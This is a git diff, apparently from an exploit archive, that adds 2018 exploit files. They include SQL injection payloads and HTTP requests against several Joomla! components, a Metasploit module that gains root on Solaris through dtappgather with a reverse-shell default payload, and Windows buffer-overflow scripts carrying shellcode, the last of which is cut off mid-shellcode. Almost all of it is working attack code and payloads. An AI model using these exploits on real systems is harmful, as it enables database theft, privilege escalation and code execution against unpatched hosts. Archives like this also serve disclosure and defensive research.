+Payload: filter_type_id=1&filter_pid_id=7 AND (SELECT 2680 FROM(SELECT COUNT(*),CONCAT(0x71766b7671,(SELECT (ELT(2680=2680,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1
+
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 OR time-based blind
+
+Payload: filter_type_id=1&filter_pid_id=7 OR SLEEP(5)&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1
+
+# Parameter: filter_search (POST)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
+
+Payload: filter_type_id=1&filter_pid_id=7&filter_search=" AND 8748=8748#&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1
+
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+
+Payload: filter_type_id=1&filter_pid_id=7&filter_search=" AND (SELECT 2429 FROM(SELECT COUNT(*),CONCAT(0x71766b7671,(SELECT (ELT(2429=2429,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- zyPZ&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1
+
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+
+Payload: filter_type_id=1&filter_pid_id=7&filter_search=" AND SLEEP(5)-- fDVO&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1
\ No newline at end of file
diff --git a/exploits/php/webapps/45473.txt b/exploits/php/webapps/45473.txt
new file mode 100644
index 000000000..9d0563bfb
--- /dev/null
+++ b/exploits/php/webapps/45473.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Exploit Title: Joomla! Component Swap Factory 2.2.1 - SQL Injection
+# Dork: N/A
+# Date: 2018-09-24
+# Vendor Homepage: https://thephpfactory.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/classified-ads/swap-factory/
+# Version: 2.2.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-17384
+# # # # #
+# Exploit Author: Ihsan Sencan
+# # # # #
+# POC: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?task=showSearchResults&Itemid=115&option=com_swapfactory&filter_order_Dir=[SQL]&filter_order=[SQL]
+# 
+# %2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29
+#  
+# # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/45474.txt b/exploits/php/webapps/45474.txt
new file mode 100644
index 000000000..0b9d5583a
--- /dev/null
+++ b/exploits/php/webapps/45474.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Exploit Title: Joomla! Component Collection Factory 4.1.9 - SQL Injection
+# Dork: N/A
+# Date: 2018-09-24
+# Vendor Homepage: https://thephpfactory.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/thematic-directory/collection-factory/
+# Version: 4.1.9
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-17383
+# # # # #
+# Exploit Author: Ihsan Sencan
+# # # # #
+# POC: 
+# 
+# 1)
+# http://localhost/[PATH]/collection-categories?option=com_collectionfactory&task=items&filter_order=[SQL]&filter_order_Dir=[SQL]
+# 
+# %2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29
+#  
+# # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/45475.txt b/exploits/php/webapps/45475.txt
new file mode 100644
index 000000000..253774b86
--- /dev/null
+++ b/exploits/php/webapps/45475.txt
@@ -0,0 +1,31 @@
+# # # # #
+# Exploit Title: Joomla! Component Reverse Auction Factory 4.3.8 - SQL Injection
+# Dork: N/A
+# Date: 2018-09-24
+# Vendor Homepage: https://thephpfactory.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/reverse-auction-factory/
+# Version: 4.3.8
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-17376
+# # # # #
+# Exploit Author: Ihsan Sencan
+# # # # #
+# POC: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_rbids&task=listauctions&filter_order_Dir=[SQL]
+# 
+# %2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29
+#  
+# 2)
+# http://localhost/[PATH]/index.php?option=com_rbids&task=listauctions&cat=[SQL]
+# 
+# %31%27%20%61%6e%64%28%73%65%6c%65%63%74%20%31%20%46%52%4f%4d%28%73%65%6c%65%63%74%20%63%6f%75%6e%74%28%2a%29%2c%63%6f%6e%63%61%74%28%28%73%65%6c%65%63%74%20%28%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%64%61%74%61%62%61%73%65%28%29%2c%30%78%32%37%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%4c%49%4d%49%54%20%30%2c%31%29%2c%66%6c%6f%6f%72%28%72%61%6e%64%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20%2d
+#  
+# 3)
+# http://localhost/[PATH]/index.php?option=com_rbids&task=categories&filter_letter=[SQL]
+# 
+# %27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
+#  
+# # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/45476.txt b/exploits/php/webapps/45476.txt
new file mode 100644
index 000000000..f9d23c697
--- /dev/null
+++ b/exploits/php/webapps/45476.txt
@@ -0,0 +1,45 @@
+# # # # #
+# Exploit Title: Joomla! Component AlphaIndex Dictionaries 1.0 - SQL Injection
+# Dork: N/A
+# Date: 2018-09-24
+# Vendor Homepage: http://multiplanet.gr/
+# Software Link: https://extensions.joomla.org/extensions/extension/authoring-a-content/alphaindex-dictionaries/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-17397
+# # # # #
+# Exploit Author: Ihsan Sencan
+# # # # #
+# POC: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_aindexdictionaries&task=getArticlesPreview
+# 
+# Parameter: letter=[SQL] (POST)
+#  
+# Payload: " AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66 ,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VerAyari
+# 
+#  POST /alphaindex-dictionaries/index.php?option=com_aindexdictionaries&task=getArticlesPreview HTTP/1.1
+#  Host: localhost
+#  User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
+#  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+#  Accept-Language: en-US,en;q=0.5
+#  Accept-Encoding: gzip, deflate
+#  Cookie: 4d2a26b1a22184c44838ed58a1427b57=a5ebafd40988be7421846f2e1a496b61
+#  Connection: keep-alive
+#  Upgrade-Insecure-Requests: 1
+#  Content-Type: application/x-www-form-urlencoded
+#  Content-Length: 200
+#  
+#  letter=" AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66 ,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VerAyari
+#  HTTP/1.1 500 Duplicate entry 'multipla_multi@localhost : multipla_dictionary : 10.2.17-MariaDB' for key 'group_key' SQL=SELECT .............
+#  Server: nginx admin
+#  Date: Mon, 17 Sep 2018 16:15:28 GMT
+#  Content-Type: text/html; charset=utf-8
+#  Transfer-Encoding: chunked
+#  Connection: keep-alive
+#  Cache-Control: no-cache
+#  Pragma: no-cache
+#  
+# # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/45477.txt b/exploits/php/webapps/45477.txt
new file mode 100644
index 000000000..ed97a49b2
--- /dev/null
+++ b/exploits/php/webapps/45477.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Exploit Title: Joomla! Component Article Factory Manager 4.3.9 - SQL Injection
+# Dork: N/A
+# Date: 2018-09-24
+# Vendor Homepage: https://thephpfactory.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/authoring-a-content/content-submission/article-factory-manager/
+# Version: 4.3.9
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-17380
+# # # # #
+# Exploit Author: Ihsan Sencan
+# # # # #
+# POC: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_articleman&view=articles&filter_search=&start_date=[SQL]&end_date=&m_start_date=[SQL]&m_end_date=[SQL]
+# 
+# %31%27%61%6e%64%20%28%73%65%6c%65%63%74%20%31%20%66%72%6f%6d%20%28%73%65%6c%65%63%74%20%63%6f%75%6e%74%28%2a%29%2c%63%6f%6e%63%61%74%28%28%73%65%6c%65%63%74%28%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%63%61%73%74%28%64%61%74%61%62%61%73%65%28%29%20%61%73%20%63%68%61%72%29%2c%30%78%37%65%29%29%20%66%72%6f%6d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%77%68%65%72%65%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%64%61%74%61%62%61%73%65%28%29%20%6c%69%6d%69%74%20%30%2c%31%29%2c%66%6c%6f%6f%72%28%72%61%6e%64%28%30%29%2a%32%29%29%78%20%66%72%6f%6d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%67%72%6f%75%70%20%62%79%20%78%29%61%29%20%41%4e%44%20%27%27%3d%27
+#  
+# # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/45478.txt b/exploits/php/webapps/45478.txt
new file mode 100644
index 000000000..87cc1e7ba
--- /dev/null
+++ b/exploits/php/webapps/45478.txt
@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: Joomla! Component Timetable Schedule 3.6.8 - SQL Injection
+# Dork: N/A
+# Date: 2018-09-24
+# Vendor Homepage: http://osthemeclub.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/timetable-schedule/
+# Version: 3.6.8
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-17394
+# # # # #
+# Exploit Author: Ihsan Sencan
+# # # # #
+# 
+# POC: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_timetableschedule&view=schedule&Itemid=492&eid=[SQL]
+# 
+# # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/45491.txt b/exploits/php/webapps/45491.txt
new file mode 100644
index 000000000..cf02b2728
--- /dev/null
+++ b/exploits/php/webapps/45491.txt
@@ -0,0 +1,98 @@
+# Exploit Title: Joomla! Component Responsive Portfolio 1.6.1 - 'filter_order_Dir' SQL Injection
+# Dork: N/A
+# Date: 2018-09-25
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor Homepage: https://extro.media/
+# Software Link: https://extensions.joomla.org/extension/rpc-responsive-portfolio/
+# Version: 1.6.1
+# Category: Webapps
+# Tested on: Kali linux
+# Description : An attacker can execute SQL commands through parameters
+# that contain vulnerable. An authorized user can use the filtering feature and can fully authorize
+# the database or other server informations.
+
+# "filter_type_id, filter_pid_id, filter_search" parameters have the same vulnerable.
+# PoC : SQLi :
+
+POST /administrator/index.php?option=com_pofos&view=pofoits
+Host: demo.extro.media
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
+Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer:
+https://demo.extro.media/administrator/index.php?option=com_pofos&view=pofoits
+Cookie: 2e7fc5dc4e4ce76c3319e1db921484ac=eqgcirsi6m53s6vbi7bbgng1n5;
+48bd4f2f65b6c84d32f8704444f9b24c=rt2t3ur8fgmbjemdqua1vn8u35
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 146
+filter_type_id=1&filter_pid_id=6&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&42665dd9e1062891c3394b621d58259f=1
+
+
+# Parameter: filter_type_id (POST)
+
+Type: boolean-based blind
+Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+Payload: filter_type_id=-7022 OR
+5787=5787#&filter_pid_id=6&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&42665dd9e1062891c3394b621d58259f=1
+
+Type: error-based
+Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+Payload: filter_type_id=1 AND (SELECT 5756 FROM(SELECT
+COUNT(*),CONCAT(0x7162706271,(SELECT
+(ELT(5756=5756,1))),0x7170706271,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY
+x)a)&filter_pid_id=6&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&42665dd9e1062891c3394b621d58259f=1
+
+Type: AND/OR time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind
+Payload: filter_type_id=1 AND
+SLEEP(5)&filter_pid_id=6&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&42665dd9e1062891c3394b621d58259f=1
+
+# Parameter: filter_pid_id (POST)
+
+Type: boolean-based blind
+Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+Payload: filter_type_id=1&filter_pid_id=-5547 OR
+1857=1857#&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1
+
+Type: error-based
+Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+Payload: filter_type_id=1&filter_pid_id=7 AND (SELECT 2680 FROM(SELECT
+COUNT(*),CONCAT(0x71766b7671,(SELECT
+(ELT(2680=2680,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY
+x)a)&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1
+
+Type: AND/OR time-based blind
+Title: MySQL >= 5.0.12 OR time-based blind
+Payload: filter_type_id=1&filter_pid_id=7 OR
+SLEEP(5)&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1
+
+
+# Parameter: filter_search (POST)
+
+Type: boolean-based blind
+Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
+Payload: filter_type_id=1&filter_pid_id=7&filter_search=" AND
+8748=8748#&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1
+
+Type: error-based
+Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+Payload: filter_type_id=1&filter_pid_id=7&filter_search=" AND (SELECT
+2429 FROM(SELECT COUNT(*),CONCAT(0x71766b7671,(SELECT
+(ELT(2429=2429,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--
+zyPZ&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1
+
+Type: AND/OR time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind
+Payload: filter_type_id=1&filter_pid_id=7&filter_search=" AND
+SLEEP(5)--
+fDVO&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1
\ No newline at end of file
diff --git a/exploits/solaris/local/45479.rb b/exploits/solaris/local/45479.rb
new file mode 100755
index 000000000..e32f22732
--- /dev/null
+++ b/exploits/solaris/local/45479.rb
@@ -0,0 +1,238 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Solaris::Priv
+  include Msf::Post::Solaris::System
+  include Msf::Post::Solaris::Kernel
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => "Solaris 'EXTREMEPARR' dtappgather Privilege Escalation",
+      'Description'    => %q{
+        This module exploits a directory traversal vulnerability in the
+        `dtappgather` executable included with Common Desktop Environment (CDE)
+        on unpatched Solaris systems prior to Solaris 10u11 which allows users
+        to gain root privileges.
+
+        dtappgather allows users to create a user-owned directory at any
+        location on the filesystem using the `DTUSERSESSION` environment
+        variable.
+
+        This module creates a directory in `/usr/lib/locale`, writes a shared
+        object to the directory, and runs the specified SUID binary with the
+        shared object loaded using the `LC_TIME` environment variable.
+
+        This module has been tested successfully on:
+
+        Solaris 9u7 (09/04) (x86);
+        Solaris 10u1 (01/06) (x86);
+        Solaris 10u2 (06/06) (x86);
+        Solaris 10u4 (08/07) (x86);
+        Solaris 10u8 (10/09) (x86);
+        Solaris 10u9 (09/10) (x86).
+      },
+      'References'     =>
+        [
+          ['BID', '97774'],
+          ['CVE', '2017-3622'],
+          ['EDB', '41871'],
+          ['URL', 'https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh'],
+          ['URL', 'http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html']
+        ],
+      'Notes'          => { 'AKA' => ['EXTREMEPARR'] },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Shadow Brokers',   # exploit
+          'Hacker Fantastic', # dtappgather-poc.sh
+          'Brendan Coles'     # Metasploit
+        ],
+      'DisclosureDate' => 'Apr 24 2017',
+      'Privileged'     => true,
+      'Platform'       => ['solaris', 'unix'],
+      'Arch'           => [ARCH_X86, ARCH_X64, ARCH_SPARC],
+      'Targets'        => [['Auto', {}]],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'DefaultOptions' =>
+        {
+          'PAYLOAD'     => 'solaris/x86/shell_reverse_tcp',
+          'WfsDelay'    => 10,
+          'PrependFork' => true
+        },
+      'DefaultTarget'  => 0))
+    register_options [
+      # Some useful example SUID executables:
+      # * /usr/bin/at
+      # * /usr/bin/cancel
+      # * /usr/bin/chkey
+      # * /usr/bin/lp
+      # * /usr/bin/lpset
+      # * /usr/bin/lpstat
+      # * /usr/lib/lp/bin/netpr
+      # * /usr/sbin/lpmove
+      OptString.new('SUID_PATH', [true, 'Path to suid executable', '/usr/bin/at']),
+      OptString.new('DTAPPGATHER_PATH', [true, 'Path to dtappgather executable', '/usr/dt/bin/dtappgather'])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit',  [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def suid_bin_path
+    datastore['SUID_PATH']
+  end
+
+  def dtappgather_path
+    datastore['DTAPPGATHER_PATH']
+  end
+
+  def mkdir(path)
+    vprint_status "Creating directory '#{path}'"
+    cmd_exec "mkdir -p '#{path}'"
+    register_dir_for_cleanup path
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_compile(path, data)
+    upload "#{path}.c", data
+
+    output = cmd_exec "PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/:/opt/csw/bin gcc -fPIC -shared -g -lc -o #{path} #{path}.c"
+    unless output.blank?
+      print_error output
+      fail_with Failure::Unknown, "#{path}.c failed to compile"
+    end
+
+    register_file_for_cleanup path
+  end
+
+  def symlink(link_target, link_name)
+    vprint_status "Symlinking #{link_target} to #{link_name}"
+    rm_f link_name
+    cmd_exec "ln -sf #{link_target} #{link_name}"
+    register_file_for_cleanup link_name
+  end
+
+  def check
+    [dtappgather_path, suid_bin_path].each do |path|
+      unless setuid? path
+        vprint_error "#{path} is not setuid"
+        return CheckCode::Safe
+      end
+      vprint_good "#{path} is setuid"
+    end
+
+    unless has_gcc?
+      vprint_error 'gcc is not installed'
+      return CheckCode::Safe
+    end
+    vprint_good 'gcc is installed'
+
+    version = kernel_release
+    if version.to_s.eql? ''
+      vprint_error 'Could not determine Solaris version'
+      return CheckCode::Detected
+    end
+
+    unless Gem::Version.new(version).between? Gem::Version.new('5.7'), Gem::Version.new('5.10')
+      vprint_error "Solaris version #{version} is not vulnerable"
+      return CheckCode::Safe
+    end
+    vprint_good "Solaris version #{version} appears to be vulnerable"
+
+    CheckCode::Appears
+  end
+
+  def exploit
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    unless [CheckCode::Detected, CheckCode::Appears].include? check
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    unless writable? datastore['WritableDir']
+      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
+    end
+
+    # Remove appmanager directory and contents
+    appmanager_path = '/var/dt/appconfig/appmanager'
+    vprint_status "Cleaning appmanager directory #{appmanager_path}"
+    cmd_exec "chmod -R 755 #{appmanager_path}/*"
+    cmd_exec "rm -rf #{appmanager_path}/*"
+    rm_f appmanager_path
+
+    # Create writable directory in /usr/lib/locale
+    locale_path = '/usr/lib/locale'
+    locale_name = rand_text_alphanumeric 5..10
+    new_dir = "#{locale_path}/#{locale_name}"
+    vprint_status "Creating directory #{new_dir}"
+    depth = 3
+    cmd_exec "DTUSERSESSION=. /usr/dt/bin/dtappgather"
+    depth.times do
+      cmd_exec "DTUSERSESSION=.. /usr/dt/bin/dtappgather"
+    end
+    symlink locale_path, appmanager_path
+    cmd_exec "DTUSERSESSION=#{locale_name} #{dtappgather_path}"
+    unless cmd_exec("ls -al #{locale_path} | grep #{locale_name}").to_s.include? locale_name
+      fail_with Failure::NotVulnerable, "Could not create directory #{new_dir}"
+    end
+
+    print_good "Created directory #{new_dir}"
+    register_dir_for_cleanup new_dir
+
+    rm_f appmanager_path
+    cmd_exec "chmod 755 #{new_dir}"
+
+    # Upload and compile shared object
+    base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
+    mkdir base_path
+
+    payload_name = ".#{rand_text_alphanumeric 5..10}"
+    payload_path = "#{base_path}/#{payload_name}"
+
+    so = <<-EOF
+      void __attribute__((constructor)) cons() {
+        setuid(0);
+        setgid(0);
+        execle("#{payload_path}", "", 0, 0);
+        _exit(0);
+      }
+    EOF
+
+    so_name = ".#{rand_text_alphanumeric 5..10}"
+    so_path = "#{base_path}/#{so_name}"
+    upload_and_compile so_path, so
+
+    vprint_status "Writing shared objects to #{new_dir}"
+    cmd_exec "cp '#{so_path}' '#{new_dir}/#{locale_name}.so.2'"
+    register_file_for_cleanup "#{new_dir}/#{locale_name}.so.2"
+    cmd_exec "cp '#{so_path}' '#{new_dir}/#{locale_name}.so.3'"
+    register_file_for_cleanup "#{new_dir}/#{locale_name}.so.3"
+
+    # Upload and execute payload
+    upload payload_path, generate_payload_exe
+    cmd_exec "chmod +x #{payload_path}"
+
+    print_status 'Executing payload...'
+    cmd_exec "LC_TIME=#{locale_name} #{suid_bin_path} & echo "
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows_x86/local/45467.py b/exploits/windows_x86/local/45467.py
new file mode 100755
index 000000000..ae28d901f
--- /dev/null
+++ b/exploits/windows_x86/local/45467.py
@@ -0,0 +1,27 @@
+# Exploit Title: Easy PhoroResQ 1.0 - Buffer Overflow (PoC)
+# Discovery by: Cemal Cihad ÇİFTÇİ
+# Discovery Date: 2018-09-24
+# Tested Version: 1.0
+# Vulnerability Type: Local Buffer Overflow
+# Tested on OS: Windows XP Professional Service Pack 3
+# Vendor Homepage: http://www.easyphotoresq.com/
+# Download Link: http://www.easyphotoresq.com/download.html
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "boom.txt". Copy the content of the new file "boom.txt". 
+# Now start the program. Now when you are inside of the programwindow #click "File" > "Options". 
+# In the field: "Folder/filename" paste the copied #content from "boom.txt". 
+# Now click "OK" and calc.exe will appear.
+
+#!/usr/bin/python
+
+buffer = "A" * 1320 + "\xdf\x44\xc6\x4e" + "\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"
+
+payload = buffer
+try:
+    f=open("boom.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86/local/45492.py b/exploits/windows_x86/local/45492.py
new file mode 100755
index 000000000..079d8735f
--- /dev/null
+++ b/exploits/windows_x86/local/45492.py
@@ -0,0 +1,51 @@
+# Exploit Title: Faleemi Desktop Software 1.8.2 - 'Device alias' Local Buffer Overflow (SEH)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-25
+# Software Link: http://support.faleemi.com/fsc776/Faleemi_v1.8.exe
+# Tested Version: 1.8.2
+# Tested on OS: Windows 7 32bit
+# Steps to Reproduce: 
+# Run the python exploit script, it will create a new file with the name 
+# "exploit.txt" just copy the text inside "exploit.txt" and start the program and click on "Managing Log".
+# In the "Device alias" field paste the content of "exploit.txt" and click on "Search". 
+# You will see a calculator poped up.
+ 
+#!/usr/bin/python
+   
+buffer = "A" * 219
+
+NSEH = "\xeb\x06\x90\x90"
+
+SEH = "\x3a\x7a\x04\x60"
+nops = "\x90" * 8
+#badchar \x00\x0a\x0d\x2f
+#msfvenom calculator
+buf =  ""
+buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29"
+buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a"
+buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b"
+buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c"
+buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a"
+buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9"
+buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21"
+buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08"
+buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85"
+buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75"
+buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64"
+buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5"
+buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16"
+buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e"
+buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92"
